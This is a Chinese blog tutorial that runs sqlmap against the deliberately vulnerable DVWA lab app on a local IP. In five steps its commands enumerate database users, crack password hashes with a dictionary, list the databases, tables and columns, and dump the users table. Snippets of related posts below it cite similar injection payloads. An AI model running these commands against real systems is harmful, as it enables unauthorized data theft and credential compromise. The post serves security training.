DVWA+SQLmap+Mysql注入实战

最新推荐文章于 2025-07-08 00:14:24 发布
最新推荐文章于 2025-07-08 00:14:24 发布
阅读量530 收藏 2
点赞数
分类专栏: kali dvwa 文章标签: dvwa sqlmap
本文详细介绍使用SQLMap工具进行SQL注入攻击的五个实战案例,包括枚举数据库用户名与密码、枚举所有数据库、枚举指定数据库的数据表、获取指定数据库和表中所有列的信息,以及枚举指定数据表中的所有用户名与密码。

实战

        实战1:枚举登录MYSQL数据的用户名与密码

        实战2:枚举所有数据库

        实战3:枚举指定数据库的数据表

        实战4:获取指定数据库和表中所有列的信息

        实战5:枚举指定数据表中的所有用户名与密码

 

       环境准备:

       1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;

 

       2)开启Firefox浏览器TamperData插件,等待获取cookies值;

 

       3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

             获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

 

       4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552

 

        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png

 

wKiom1ir7xaQEBcYAABbjMUXB0w015.png

 

 

实战1:枚举登录MYSQL数据的用户名与密码

   sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user

 

说明:根据提示回复Y,继续

 

wKiom1ir73_DP8MFAABNbA9Svfw188.png

 

结果:得到当前数据库为dawa,使用的用户为root@localhost

 

wKioL1ir75iB4QDPAAA4GIZMCIU558.png

 

 

实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

     

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png

 

说明:选择目录下字典文件,暴力破解

 

wKioL1ir79zz1rl9AAAboWh7XLg480.png

 

结果:数据库用户名为root,密码也有明文形式123456

 

wKiom1ir7-igiyGKAAAj8h9xVlw598.png

 

 

实战3:枚举数据库和指定数据库的数据表

   sqlmap语法参数:

  • --dbs:枚举当前数据库

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs

 

结果:mysql下所有的数据库

wKiom1ir8ALiZIK3AAAmjvflPbM786.png

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables

 

结果:dvwa库中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png

 

实战4:获取指定数据库和表中所有列的信息

   sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns

 

结果:dvwa库,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png

 

 

实战5:枚举指定数据表中的所有用户名与密码

   sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump

 

结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png

原文出处:https://blog.51cto.com/huangzp/1899871

DVWA-SQL注入sqlmap安装和使用)
m0_64037702的博客
07-12 1230
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
sqlmap扫描DVWA靶场(sql注入低、中、高)
xingxin32的博客
06-15 630
二、打开kali,在网页输入搭建好dvwa主机的IP(ps:Windows系统IP查询命令ipconfig,Linux系统IP查询命令ifconfig)6.点开Repeater,并修改代码为id=1 or 1=1(注意:这里根据kali版本的不同,有些需要后面加#,有些不需要)Windows电脑、下载phpstudy、搭建好dvwa靶场、里面有kali、sqlmap、burpsuite等软件。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。
SQL注入部分:DVWA+SQLmap+Mysql注入实战
m1287578441的博客
12-25 234
1.注入点发现。首先要判断是否有注入漏洞 在输入框输入1,返回 返回正常 2.在输入一波1 报错,返回 此时可以断定有SQL注入漏洞 3.然后利用SQLMap进行注入攻击,再将DVWA安全级别设置为最低。 这是一些sql的基本语法 4.枚举当前使用的数据库名称和用户名 咱们输入命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PH
SQL注入DVWA平台测试mysql注入
weixin_34309435的博客
09-19 252
今天主要针对mysql常用注入语句进行测试。 测试环境与工具: 测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。 渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103     首先我们介绍下DVWA...
SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
Until_U的博客
07-05 5953
1 项目实验环境 测试渗透机:kali_linux-2020 链接:https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码:32ve 目标靶机:owasp_Broken_Web_Apps 链接:https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码:9zsj 2 SQL注入概述 2.1 SQL注入简介 在owasp年度top 10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊..
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 2320
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
【渗透测试】|sqlmap工具注入-基于dvwa的sql injection
yangdan_jiayou的博客
03-27 1435
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
DVWA演练平台之SQL注入(全新认识)
weixin_30401605的博客
05-28 96
1.开启平台,打开页面(low)。 2.测试id参数。 加单引号试试: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1闭合...
Sqlmap
mumuzi2的博客
02-25 434
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4463
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
sqlmapDVWA 进行自动化 SQL 注入测试
最新发布
weixin_43435891的博客
07-08 739
SQLMap是一款功能强大的开源SQL注入工具,能够自动检测和利用SQL注入漏洞。它支持多种数据库(MySQL、Oracle等),可自动识别注入点(GET/POST/Cookie等),并能枚举数据库信息、提取数据甚至执行系统命令。常用命令包括基本检测、查看数据库/表/字段、数据导出等,支持代理/WAF绕过。但需注意:未经授权测试违法,可能造成服务崩溃,且遇到强WAF时需配合其他工具。建议仅用于授权测试或靶场练习。
sqlmap自动化漏洞利用(DVWA初、中、高)
热门推荐
qq_42620328的博客
10-14 1万+
sqlmap自动化漏洞利用(DVWA
sqlmap dvwa SQL Injection使用小记
无心插柳
10-29 9605
sqlmap初步使用,测试环境为dvwa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值